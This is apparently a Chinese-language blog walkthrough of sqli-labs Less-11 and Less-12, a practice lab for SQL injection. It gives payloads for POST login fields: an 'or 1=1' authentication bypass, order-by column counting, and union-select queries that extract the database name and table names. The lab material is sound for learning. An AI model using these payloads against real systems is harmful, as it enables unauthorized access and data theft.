前言
SQL注入基础知识已结完,现在开始更sqli-labs的Writeup,同种方法分一类
Less-11
这题开始就是POST请求了,尝试输入值

报错

可知这里用单引号闭合,可构造payload尝试password=1' or 1=1#
可发现登陆成功,接下来可按照正常步骤进行注入
查看字段个数
=1' or 1=1 order by 1#
=1' or 1=1 order by 2#
当by 3
时报错Unknown column '3' in 'order clause'
可知个数为2
爆库
=1' union select 1,database()#

爆表
=1' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)#

Less-12
尝试输入username=1',password=2'
,没反应,输入username=1",password=2"
,报错了

可知这里是")
闭合,其他步骤跟Less-11一样了
声明:
本文采用
BY-NC-SA
协议进行授权,如无注明均为原创,转载请注明转自
迷失的老鼠
本文地址: sqli-labs Less-11 to Less-12
本文地址: sqli-labs Less-11 to Less-12